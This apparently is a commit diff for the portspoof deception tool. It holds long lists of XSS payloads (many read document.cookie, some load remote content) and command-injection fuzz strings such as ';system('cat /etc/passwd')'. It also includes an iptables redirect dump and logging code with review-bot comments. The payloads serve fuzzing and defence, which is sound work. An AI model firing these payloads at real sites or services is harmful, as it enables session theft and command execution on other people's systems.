<script>Object.defineProperties(window,%20{Safe:%20{value:%20{get:%20function()%20{return%20document.cookie}}}});alert(Safe.get())</script>
|
||||
<script>var%20x%20=%20document.createElement('iframe');document.body.appendChild(x);var%20xhr%20=%20x.contentWindow.XMLHttpRequest();xhr.open('GET',%20'http://xssme.html5sec.org/xssme2',%20true);xhr.onload%20=%20function()%20{%20alert(xhr.responseText.match(/cookie%20=%20'(.*?)'/)[1])%20};xhr.send();</script>
|
||||
<script>(function()%20{var%20event%20=%20document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22,%20true,%20true,%20window,%200,%200,%200,%200,%200,%20false,%20false,%20false,%20false,%200,%20null);var%20fakeData%20=%20[event,%20{isTrusted:%20true},%20event];arguments.__defineGetter__('0',%20function()%20{%20return%20fakeData.pop();%20});alert(Safe.get.apply(null,%20arguments));})();</script>
|
||||
<script>var%20script%20=%20document.getElementsByTagName('script')[0];%20var%20clone%20=%20script.childNodes[0].cloneNode(true);%20var%20ta%20=%20document.createElement('textarea');%20ta.appendChild(clone);%20alert(ta.value.match(/cookie%20=%20'(.*?)'/)[1])</script>
|
||||
<script>xhr=new%20ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script>
|
||||
<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script>
|
||||
<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script>
|
||||
<%73%63%72%69%70%74>%20%64%20=%20%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22);%20%64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65));%20%61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65%20=%20'(%2e%2a%3f)'%22)[%31]);%20</%73%63%72%69%70%74>
|
||||
<script>%20var%20xdr%20=%20new%20ActiveXObject(%22Microsoft.XMLHTTP%22);%20%20xdr.open(%22get%22,%20%22/xssme2%3Fa=1%22,%20true);%20xdr.onreadystatechange%20=%20function()%20{%20try{%20%20%20var%20c;%20%20%20if%20(c=xdr.responseText.match(/document.cookie%20=%20'(.*%3F)'/)%20)%20%20%20%20alert(c[1]);%20}catch(e){}%20};%20%20xdr.send();%20</script>
|
||||
<iframe%20id=%22ifra%22%20src=%22/%22></iframe>%20<script>ifr%20=%20document.getElementById('ifra');%20ifr.contentDocument.write(%22<scr%22%20%2b%20%22ipt>top.foo%20=%20Object.defineProperty</scr%22%20%2b%20%22ipt>%22);%20foo(window,%20'Safe',%20{value:{}});%20foo(Safe,%20'get',%20{value:function()%20{%20%20%20%20return%20document.cookie%20}});%20alert(Safe.get());</script>
|
||||
<script>alert(document.head.innerHTML.substr(146,20));</script>
|
||||
<script>alert(document.head.childNodes[3].text)</script>
|
||||
<script>var%20request%20=%20new%20XMLHttpRequest();request.open('GET',%20'http://html5sec.org/xssme2',%20false);request.send(null);if%20(request.status%20==%20200){alert(request.responseText.substr(150,41));}</script>
|
||||
<script>Object.defineProperty(window,%20'Safe',%20{value:{}});Object.defineProperty(Safe,%20'get',%20{value:function()%20{return%20document.cookie}});alert(Safe.get())</script>
|
||||
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new%20XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script>
|
||||
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return%20top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script>
|
||||
<script>%20var+xmlHttp+=+null;%20try+{%20xmlHttp+=+new+XMLHttpRequest();%20}+catch(e)+{}%20if+(xmlHttp)+{%20xmlHttp.open('GET',+'/xssme2',+true);%20xmlHttp.onreadystatechange+=+function+()+{%20if+(xmlHttp.readyState+==+4)+{%20xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi);%20alert(RegExp.%241);%20}%20}%20xmlHttp.send(null);%20};%20</script>
|
||||
<script>%20document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());}%20document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true});%20</script>
|
||||
<script>%20var+MouseEvent=function+MouseEvent(){};%20MouseEvent=MouseEvent%20var+test=new+MouseEvent();%20test.isTrusted=true;%20test.type='click';%20%20document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());}%20document.getElementById(%22safe123%22).click(test);%20</script>
|
||||
<script>%20%20(function%20(o)%20{%20%20%20function%20exploit(x)%20{%20%20%20%20if%20(x%20!==%20null)%20%20%20%20%20alert('User%20cookie%20is%20'%20%2B%20x);%20%20%20%20else%20%20%20%20%20console.log('fail');%20%20%20}%20%20%20%20%20%20o.onclick%20=%20function%20(e)%20{%20%20%20%20e.__defineGetter__('isTrusted',%20function%20()%20{%20return%20true;%20});%20%20%20%20exploit(Safe.get());%20%20%20};%20%20%20%20%20%20var%20e%20=%20document.createEvent('MouseEvent');%20%20%20e.initEvent('click',%20true,%20true);%20%20%20o.dispatchEvent(e);%20%20})(document.getElementById('safe123'));%20</script>
|
||||
<iframe%20src=/%20onload=eval(unescape(this.name.replace(/\/g,null)))%20name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>
|
||||
<script>%20%20%20%20%20function%20b()%20{%20return%20Safe.get();%20}%20alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true}));%20</script>%20
|
||||
<img%20src=http://www.google.fr/images/srpr/logo3w.png%20onload=alert(this.ownerDocument.cookie)%20width=0%20height=%200%20/>%20#
|
||||
<script>%20%20function%20foo(elem,%20doc,%20text)%20{%20%20%20elem.onclick%20=%20function%20(e)%20{%20%20%20%20e.__defineGetter__(text[0],%20function%20()%20{%20return%20true%20})%20%20%20%20alert(Safe.get());%20%20%20};%20%20%20%20%20%20var%20event%20=%20doc.createEvent(text[1]);%20%20%20event.initEvent(text[2],%20true,%20true);%20%20%20elem.dispatchEvent(event);%20%20}%20</script>%20<img%20src=http://www.google.fr/images/srpr/logo3w.png%20onload=foo(this,this.ownerDocument,this.name.split(/,/))%20name=isTrusted,MouseEvent,click%20width=0%20height=0%20/>%20#%20
|
||||
<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#
|
||||
<script>%20var+xmlHttp+=+null;%20try+{%20xmlHttp+=+new+XMLHttpRequest();%20}+catch(e)+{}%20if+(xmlHttp)+{%20xmlHttp.open('GET',+'/xssme2',+true);%20xmlHttp.onreadystatechange+=+function+()+{%20if+(xmlHttp.readyState+==+4)+{%20xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi);%20alert(RegExp.%241);%20}%20}%20xmlHttp.send(null);%20};%20</script>#
|
||||
<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23
|
||||
<script%20for=document%20event=onreadystatechange>getElementById('safe123').click()</script>
|
||||
<script>%20var+x+=+showModelessDialog+(this);%20alert(x.document.cookie);%20</script>
|
||||
<script>%20location.href%20=%20'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4=';%20</script>
|
||||
<iframe%20src=%22404%22%20onload=%22frames[0].document.write(%26quot;<script>r=new%20XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||
<iframe%20src=%22404%22%20onload=%22content.frames[0].document.write(%26quot;<script>r=new%20XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||
<iframe%20src=%22404%22%20onload=%22self.frames[0].document.write(%26quot;<script>r=new%20XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||
<iframe%20src=%22404%22%20onload=%22top.frames[0].document.write(%26quot;<script>r=new%20XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||
<script>var%20x%20=%20safe123.onclick;safe123.onclick%20=%20function(event)%20{var%20f%20=%20false;var%20o%20=%20{%20isTrusted:%20true%20};var%20a%20=%20[event,%20o,%20event];var%20get;event.__defineGetter__('type',%20function()%20{get%20=%20arguments.callee.caller.arguments.callee;return%20'click';});var%20_alert%20=%20alert;alert%20=%20function()%20{%20alert%20=%20_alert%20};x.apply(null,%20a);(function()%20{arguments.__defineGetter__('0',%20function()%20{%20return%20a.pop();%20});alert(get());})();};safe123.click();</script>#
|
||||
<iframe%20onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var%20xhr%20=%20new%20XMLHttpRequest();xhr.open('GET',%20'http://xssme.html5sec.org/xssme2',%20true);xhr.onload%20=%20function()%20{%20alert(xhr.responseText.match(/cookie%20=%20'(.*?)'/)[1])%20};xhr.send();
|
||||
<textarea%20id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie%20=%20'(.*?)'/)[1])</script>
|
||||
<textarea%20id=ta%20onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;)%20autofocus></textarea>
|
||||
<iframe%20onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var%20xhr%20=%20new%20XMLHttpRequest();xhr.open('GET',%20'http://xssme.html5sec.org/xssme2',%20true);xhr.onload%20=%20function()%20{%20alert(xhr.responseText.match(/cookie%20=%20'(.*?)'/)[1])%20};xhr.send();
|
||||
<textarea%20id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie%20=%20'(.*?)'/)[1])</script>
|
||||
<script>function%20x(window)%20{%20eval(location.hash.substr(1))%20}</script><iframe%20id=iframe%20src=%22javascript:parent.x(window)%22><iframe>#var%20xhr%20=%20new%20window.XMLHttpRequest();xhr.open('GET',%20'http://xssme.html5sec.org/xssme2',%20true);xhr.onload%20=%20function()%20{%20alert(xhr.responseText.match(/cookie%20=%20'(.*?)'/)[1])%20};xhr.send();
|
||||
<textarea%20id=ta%20onfocus=%22write('<script>alert(1)</script>')%22%20autofocus></textarea>
|
||||
<object%20data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22>
|
||||
<script>function%20x(window)%20{%20eval(location.hash.substr(1))%20};%20open(%22javascript:opener.x(window)%22)</script>#var%20xhr%20=%20new%20window.XMLHttpRequest();xhr.open('GET',%20'http://xssme.html5sec.org/xssme2',%20true);xhr.onload%20=%20function()%20{%20alert(xhr.responseText.match(/cookie%20=%20'(.*?)'/)[1])%20};xhr.send();
|
||||
%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E
|
||||
<iframe%20src=`http://xssme.html5sec.org/?xss=<iframe%20onload=%22xhr=new%20XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>
|
||||
<a%20target="x"%20href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E
|
||||
<a%20target="x"%20href="xssme?xss=<script>var%20cl=Components;var%20fcc=String.fromCharCode;doc=cl.lookupMethod(top,%20fcc(100,111,99,117,109,101,110,116)%20)(%20);cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe%20src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b%20name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>
|
||||
<a%20target="x"%20href="xssme?xss=<script>find('cookie');%20var%20doc%20=%20getSelection().getRangeAt(0).startContainer.ownerDocument;%20console.log(doc);%20var%20xpe%20=%20new%20XPathEvaluator();%20var%20nsResolver%20=%20xpe.createNSResolver(doc);%20var%20result%20=%20xpe.evaluate('//script/text()',%20doc,%20nsResolver,%200,%20null);%20alert(result.iterateNext().data.match(/cookie%20=%20'(.*?)'/)[1])</script>
|
||||
<a%20target="x"%20href="xssme?xss=<script>function%20x(window)%20{%20eval(location.hash.substr(1))%20}</script><iframe%20src=%22javascript:parent.x(window);%22></iframe>#var%20xhr%20=%20new%20window.XMLHttpRequest();xhr.open('GET',%20'.',%20true);xhr.onload%20=%20function()%20{%20alert(xhr.responseText.match(/cookie%20=%20'(.*?)'/)[1])%20};xhr.send();
|
||||
Garethy%20Salty%20Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(),%20'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>
|
||||
<a%20href="javascript:\u0061le%72t(1)"><button>
|
||||
<div%20onmouseover='alert(1)'>DIV</div>
|
||||
<iframe%20style="position:absolute;top:0;left:0;width:100%;height:100%"%20onmouseover="prompt(1)">
|
||||
<a%20href="jAvAsCrIpT:alert(1)">X</a>
|
||||
<embed%20src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">%20?
|
||||
<object%20data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">?
|
||||
<var%20onmouseover="prompt(1)">On%20Mouse%20Over</var>?
|
||||
<a%20href=javascript:alert(document.cookie)>Click%20Here</a>
|
||||
<img%20src="/"%20=_="%20title="onerror='prompt(1)'">
|
||||
<%<!--'%><script>alert(1);</script%20-->
|
||||
<script%20src="data:text/javascript,alert(1)"></script>
|
||||
<iframe/src%20\/\/onload%20=%20prompt(1)
|
||||
<iframe/onreadystatechange=alert(1)
|
||||
<svg/onload=alert(1)
|
||||
<input%20value=<><iframe/src=javascript:confirm(1)
|
||||
<input%20type="text"%20value=``<div/onmouseover='alert(1)'>X</div>
|
||||
http://www.<script>alert(1)</script%20.com
|
||||
<iframe%20%20src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe>%20?
|
||||
<svg><script%20?>alert(1)
|
||||
<iframe%20%20src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
|
||||
<img%20src=`xx:xx`onerror=alert(1)>
|
||||
<object%20type="text/x-scriptlet"%20data="http://jsfiddle.net/XLE63/%20"></object>
|
||||
<meta%20http-equiv="refresh"%20content="0;javascript:alert(1)"/>?
|
||||
<math><a%20xlink:href="//jsfiddle.net/t846h/">click
|
||||
<embed%20code="http://businessinfo.co.uk/labs/xss/xss.swf"%20allowscriptaccess=always>?
|
||||
<svg%20contentScriptType=text/vbs><script>MsgBox+1
|
||||
<a%20href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
|
||||
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061')%20worksinIE>
|
||||
<script>~'\u0061'%20;%20%20\u0074\u0068\u0072\u006F\u0077%20~%20\u0074\u0068\u0069\u0073.%20%20\u0061\u006C\u0065\u0072\u0074(~'\u0061')</script%20U+
|
||||
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script%20a=\u0061%20&%20/=%2F
|
||||
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script%20????????????
|
||||
<object%20data=javascript:\u0061le%72t(1)>
|
||||
<script>+-+-1-+-+alert(1)</script>
|
||||
<body/onload=<!-->
alert(1)>
|
||||
<script%20itworksinallbrowsers>/*<script*%20*/alert(1)</script%20?
|
||||
<img%20src%20?itworksonchrome?\/onerror%20=%20alert(1)???
|
||||
<svg><script>//
confirm(1);</script%20</svg>
|
||||
<svg><script%20onlypossibleinopera:-)>%20alert(1)
|
||||
<a%20aa%20aaa%20aaaa%20aaaaa%20aaaaaa%20aaaaaaa%20aaaaaaaa%20%20aaaaaaaaa%20aaaaaaaaaa%20%20href=javascript:alert(1)>ClickMe
|
||||
<script%20x>%20alert(1)%20</script%201=2
|
||||
<div/onmouseover='alert(1)'>%20style="x:">
|
||||
<--`<img/src=`%20onerror=alert(1)>%20--!>
|
||||
<script/src=data:text/javascript,alert(1)></script>%20?
|
||||
<div%20%20style="position:absolute;top:0;left:0;width:100%;height:100%"%20%20onmouseover="prompt(1)"%20onclick="alert(1)">x</button>?
|
||||
"><img%20src=x%20onerror=window.open('https://www.google.com/');>
|
||||
<form><button%20formaction=javascript:alert(1)>CLICKME
|
||||
<math><a%20xlink:href="//jsfiddle.net/t846h/">click
|
||||
<object%20data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?
|
||||
<iframe%20%20src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
|
||||
<a%20%20href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click%20%20Me</a>
|
||||
"><img%20src=x%20onerror=prompt(1);>
|
||||
!'
|
||||
!@#$%%^#$%#$@#$%$$@#$%^^**(()
|
||||
!@#0%^#0##018387@#0^^**(()
|
||||
"><script>"
|
||||
">xxx<P>yyy
|
||||
"\t"
|
||||
#
|
||||
#'
|
||||
#'
|
||||
#xA
|
||||
#xA#xD
|
||||
#xD
|
||||
#xD#xA
|
||||
$NULL
|
||||
$null
|
||||
%
|
||||
%00
|
||||
%00/
|
||||
%01%02%03%04%0a%0d%0aADSF
|
||||
%0a
|
||||
%20
|
||||
%20|
|
||||
%2500
|
||||
%250a
|
||||
%2A
|
||||
%2C
|
||||
%2e%2e%2f
|
||||
%3C%3F
|
||||
%5C
|
||||
%5C/
|
||||
%60
|
||||
%7C
|
||||
|
||||
|
||||
|
||||
|
||||
'
|
||||
";id"
|
||||
(')
|
||||
*
|
||||
*'
|
||||
*'
|
||||
*|
|
||||
+%00
|
||||
-
|
||||
--
|
||||
-1
|
||||
-1.0
|
||||
-2
|
||||
-20
|
||||
-268435455
|
||||
..%%35%63
|
||||
..%%35c
|
||||
..%25%35%63
|
||||
..%255c
|
||||
..%5c
|
||||
..%bg%qf
|
||||
..%c0%af
|
||||
..%u2215
|
||||
..%u2216
|
||||
../
|
||||
..\
|
||||
/
|
||||
/%00/
|
||||
/%2A
|
||||
/'
|
||||
/'
|
||||
0
|
||||
00
|
||||
0xfffffff
|
||||
1
|
||||
1.0
|
||||
2
|
||||
2147483647
|
||||
268435455
|
||||
65536
|
||||
;
|
||||
<%20%20script%20>%20<%20/%20script>
|
||||
<?
|
||||
?x=
|
||||
?x="
|
||||
?x=>
|
||||
?x=|
|
||||
@'
|
||||
@'
|
||||
A
|
||||
ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|
|
||||
FALSE
|
||||
NULL
|
||||
TRUE
|
||||
[']
|
||||
[']
|
||||
\
|
||||
\"blah
|
||||
\'
|
||||
\'
|
||||
\0
|
||||
\00
|
||||
\00\00
|
||||
\00\00\00
|
||||
\0\0
|
||||
\0\0\0
|
||||
\\
|
||||
\\/
|
||||
\\\\*
|
||||
\\\\?\\
|
||||
\t
|
||||
^'
|
||||
^'
|
||||
`
|
||||
id%00
|
||||
id%00|
|
||||
null
|
||||
something%00html
|
||||
{'}
|
||||
{'}
|
||||
|
|
||||
}
|
29
src/src/fuzz_payloads_cmd_exec
Normal file
29
src/src/fuzz_payloads_cmd_exec
Normal file
@ -0,0 +1,29 @@
|
||||
a);id
|
||||
a;id
|
||||
a);id;
|
||||
a;id;
|
||||
a);id|
|
||||
a;id|
|
||||
a)|id
|
||||
a|id
|
||||
a)|id;
|
||||
a|id
|
||||
|/bin/ls -al
|
||||
a);/usr/bin/id
|
||||
a;/usr/bin/id
|
||||
a);/usr/bin/id;
|
||||
a;/usr/bin/id;
|
||||
a);/usr/bin/id|
|
||||
a;/usr/bin/id|
|
||||
a)|/usr/bin/id
|
||||
a|/usr/bin/id
|
||||
a)|/usr/bin/id;
|
||||
a|/usr/bin/id
|
||||
;system('cat%20/etc/passwd')
|
||||
;system('id')
|
||||
;system('/usr/bin/id')
|
||||
%0Acat%20/etc/passwd
|
||||
%0A/usr/bin/id
|
||||
%0Aid
|
||||
%0A/usr/bin/id%0A
|
||||
%0Aid%0A
|
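--- a/src/src/ipt
+++ b/src/src/ipt
@@ -0,0 +1,21 @@
+# Generated by iptables-save v1.4.4 on Tue Apr 23 14:26:41 2013
+*nat
+:PREROUTING ACCEPT [5992:539002]
+:INPUT ACCEPT [347451:16935290]
+:OUTPUT ACCEPT [477:45868]
+:POSTROUTING ACCEPT [0:0]
+-A PREROUTING -i eth1 -p tcp -m tcp --dport 1:65535 -j REDIRECT --to-ports 4444
+-A PREROUTING -d 91.220.39.30/32 -p tcp -m tcp --dport 443 -j DNAT --to-destination 192.168.97.1:8080
+-A PREROUTING -d 91.220.39.30/32 -p tcp -m tcp --dport 443 -j DNAT --to-destination 192.168.97.1:8080
+-A POSTROUTING -j MASQUERADE
+-A POSTROUTING -o eth1 -j MASQUERADE
+COMMIT
+# Completed on Tue Apr 23 14:26:42 2013
+# Generated by iptables-save v1.4.4 on Tue Apr 23 14:26:42 2013
+*filter
+:INPUT ACCEPT [1931192:104113948]
+:FORWARD ACCEPT [0:0]
+:OUTPUT ACCEPT [1606583:151106362]
+-A FORWARD -j ACCEPT
+COMMIT
+# Completed on Tue Apr 23 14:26:42 2013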
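Review bot: This file is a host-specific `iptables-save` dump rather than a template: it carries a public address (`91.220.39.30`), an internal DNAT target (`192.168.97.1:8080`, listed twice) and the packet counters of the machine it was taken on. Loading it with `iptables-restore` would replace a user's ruleset with default-ACCEPT policies, `-A FORWARD -j ACCEPT` and an unconditional `-A POSTROUTING -j MASQUERADE`. If an example is intended, keep only the redirect rule, `-A PREROUTING -i eth1 -p tcp -m tcp --dport 1:65535 -j REDIRECT --to-ports 4444`, under a comment saying that the interface and port are placeholders; otherwise the file should be left out of the commit.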
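--- a/src/src/log.cpp
+++ b/src/src/log.cpp
@@ -0,0 +1,49 @@
+#include "log.h"
+#include <syslog.h>
+#include <pthread.h>
+#include <stdio.h>
+#include <unistd.h>
+
+pthread_cond_t log_cond = PTHREAD_COND_INITIALIZER;
+pthread_mutex_t log_mutex = PTHREAD_MUTEX_INITIALIZER;
+
+
+void log_create(const char* file){
+
+FILE *fp = fopen(configuration->getLogFile().c_str(), "a");
+if (fp == NULL) {
+fp = fopen(configuration->getLogFile().c_str(), "w");
+}
+
+fclose(fp);
+return;
+
+}
+void log_write(const char* msg) {
+
+pthread_mutex_lock(&log_mutex);
+
+if(configuration->getConfigValue(OPT_LOG_FILE))
+{
+FILE *fp = fopen(configuration->getLogFile().c_str(), "a");
+if (fp == NULL) {
+fprintf(stdout,"Error opening file: %s \n",configuration->getLogFile().c_str());
+exit(1);
+}
+
+fprintf(fp,"%s",msg);
+fclose(fp);
+
+}
+
+if(!(configuration->getConfigValue(OPT_SYSLOG_DIS)))
+{
+openlog("portspoof", LOG_PID|LOG_CONS, LOG_USER);
+syslog(LOG_INFO," %s",msg);
+closelog();
+}
+pthread_mutex_unlock(&log_mutex);
+
+return;
+
+}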
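Review bot: `log_create` calls `fclose(fp)` even when both `fopen` attempts have failed, so an unwritable log path hands a null pointer to `fclose`; the function also ignores its `file` argument and re-reads `configuration->getLogFile()`. Check the handle before closing it, for example `if (fp == NULL) { perror("log_create"); exit(1); }` placed just above `fclose(fp);`. In `log_write`, the `exit(1)` on a failed open runs while `log_mutex` is still locked, and the file calls `exit` without including `<stdlib.h>`. `log_cond` is defined but not used anywhere in this file.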
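--- a/src/src/log.h
+++ b/src/src/log.h
@@ -0,0 +1,8 @@
+#define MAX_LOG_MSG_LEN 200
+#include "Configuration.h"
+
+class Configuration;
+extern Configuration* configuration;
+
+void log_create(const char* file);
+void log_write(const char* msg);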
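Review bot: log.h has no include guard, so a translation unit that reaches it twice redefines `MAX_LOG_MSG_LEN` and repeats the declarations; wrap the contents in `#ifndef LOG_H` / `#define LOG_H` … `#endif`. The forward declaration `class Configuration;` is redundant directly after `#include "Configuration.h"`. `MAX_LOG_MSG_LEN` is defined here, but `log_write` in log.cpp takes an unbounded `const char*`, so a short comment saying where that limit is meant to be enforced would help callers.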
0
src/src/log.txt
Normal file
0
src/src/log.txt
Normal file
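--- a/src/src/main.cpp
+++ b/src/src/main.cpp
@@ -0,0 +1,149 @@
+/*
+* portspoof Service signature obfucastor
+* Copyright (C) 12012 Piotr Duszyński <piotr[at]duszynski.eu>
+*
+* This program is free software; you can redistribute it and/or modify it
+* under the terms of the GNU General Public License as published by the
+* Free Software Foundation; either version 2 of the License, or (at your
+* option) any later version.
+*
+* This program is distributed in the hope that it will be useful,
+* but WITHOUT ANY WARRANTY; without even the implied warranty of
+* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+* See the GNU General Public License for more details.
+*
+* You should have received a copy of the GNU General Public License along
+* with this program; if not, see <http://www.gnu.org/licenses>.
+*
+* Linking portspoof statically or dynamically with other modules is making
+* a combined work based on portspoof. Thus, the terms and conditions of
+* the GNU General Public License cover the whole combination.
+*
+* In addition, as a special exception, the copyright holder of portspoof
+* gives you permission to combine portspoof with free software programs or
+* libraries that are released under the GNU LGPL. You may copy
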